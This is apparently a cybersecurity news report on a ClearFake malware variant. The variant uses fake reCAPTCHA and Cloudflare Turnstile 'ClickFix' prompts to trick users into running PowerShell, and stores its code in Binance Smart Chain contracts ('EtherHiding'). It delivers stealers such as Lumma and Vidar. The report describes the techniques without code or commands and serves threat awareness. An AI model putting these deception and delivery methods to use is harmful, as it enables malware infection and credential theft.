A recent variant of the ClearFake malware framework has been identified, leveraging fake reCAPTCHA and Cloudflare Turnstile challenges to deceive users into executing malicious PowerShell commands.
This evolution marks a significant escalation in the threat’s capabilities, as it continues to exploit Web3 technologies for malware delivery.
Technical Overview
ClearFake, first detected in July 2023, initially used a straightforward JavaScript injection technique on compromised websites to trick users into downloading fake browser updates.
However, by December 2024, it had incorporated new tactics, including fake reCAPTCHA and Cloudflare Turnstile verifications, to lure users into executing malicious PowerShell scripts.
These scripts are fetched from the Binance Smart Chain using smart contracts, which store obfuscated JavaScript code and other resources necessary for the infection process.
The malware’s interaction with the Binance Smart Chain involves loading multiple JavaScript codes and additional resources that fingerprint the victim’s system.
It also downloads, decrypts, and displays the ClickFix lure, which is hosted on Cloudflare Pages.
The ClickFix tactic deceives users by presenting fake error messages, prompting them to execute PowerShell commands to resolve supposed technical issues.
According to Sekoia Report, these commands are designed to infect the user’s system with malware such as Emmenhtal Loader and Lumma Stealer.
Malware Delivery and Payloads
The latest ClearFake variant employs an advanced technique known as EtherHiding, where malicious content is stored in smart contracts on the Binance Smart Chain.
This approach makes it challenging to remove the malicious data from the blockchain, allowing attackers to utilize a legitimate database for storing and distributing malware.
The framework has been observed distributing various payloads, including Emmenhtal Loader, which ultimately delivers Lumma Stealer, and Vidar Stealer.
The use of PowerShell commands to execute these payloads highlights the threat’s ability to adapt and evade detection.
The ClearFake framework’s reliance on blockchain technology for storing and executing malicious code presents a double-edged sword.
While it offers attackers a persistent method for distributing malware, it also opens opportunities for other threat actors to leverage the framework for their own malicious purposes.
As of February 2025, ClearFake continues to evolve, with daily updates to its code and payloads, making it a persistent and evolving threat in the cybersecurity landscape.
